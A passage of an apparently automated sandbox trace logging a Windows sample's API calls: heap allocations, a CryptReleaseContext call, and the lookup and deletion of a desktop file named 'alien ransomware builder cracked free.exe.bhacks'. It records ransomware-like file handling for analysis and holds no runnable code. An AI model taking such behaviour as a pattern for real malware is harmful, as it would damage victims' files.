lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0089.404] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.404] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0089.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0089.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0089.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0089.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74748 [0089.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0089.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0089.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0089.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0089.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0089.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0089.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0089.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0089.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0089.407] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0089.407] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0089.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0089.407] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0089.407] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.407] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0089.407] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.407] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.407] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0089.408] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.408] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0089.408] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.408] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.408] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0089.408] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0089.408] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0089.408] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0089.408] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0089.409] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.409] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0089.409] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0089.409] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.409] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0089.409] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.409] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0089.409] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.409] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0089.409] FreeLibrary (hLibModule=0x76390000) returned 1 [0089.409] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.409] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.409] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.410] CloseHandle (hObject=0x294) returned 1 [0089.410] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.410] CloseHandle (hObject=0x2c4) returned 1 [0089.489] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.494] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.494] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.494] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.494] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/alien ransomware builder cracked free.exe.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks", lpFilePart=0x8cedf4*="alien ransomware builder cracked free.exe.bhacks") returned 0x48 [0089.494] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe.bhacks")) returned 0x20 [0089.494] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2584d4ec, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2584d4ec, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xf0b30, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="alien ransomware builder cracked free.exe.bhacks", cAlternateFileName="ALIENR~1.BHA")) returned 0x9a3f00 [0089.494] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\alien ransomware builder cracked free.exe.bhacks")) returned 1 [0089.503] FindNextFileW (in: hFindFile=0x9a3f00, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2584d4ec, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2584d4ec, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xf0b30, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="alien ransomware builder cracked free.exe.bhacks", cAlternateFileName="ALIENR~1.BHA")) returned 0 [0089.503] FindClose (in: hFindFile=0x9a3f00 | out: hFindFile=0x9a3f00) returned 1 [0089.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0089.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0089.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.503] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0089.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684b0 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0089.504] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92c8 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.504] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684b0 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.504] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.504] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75df8 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa66f0 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x130) returned 0x2a74958 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75df8 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0089.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.505] RtlAllocateHeap (HeapHandle=0x2af0000, 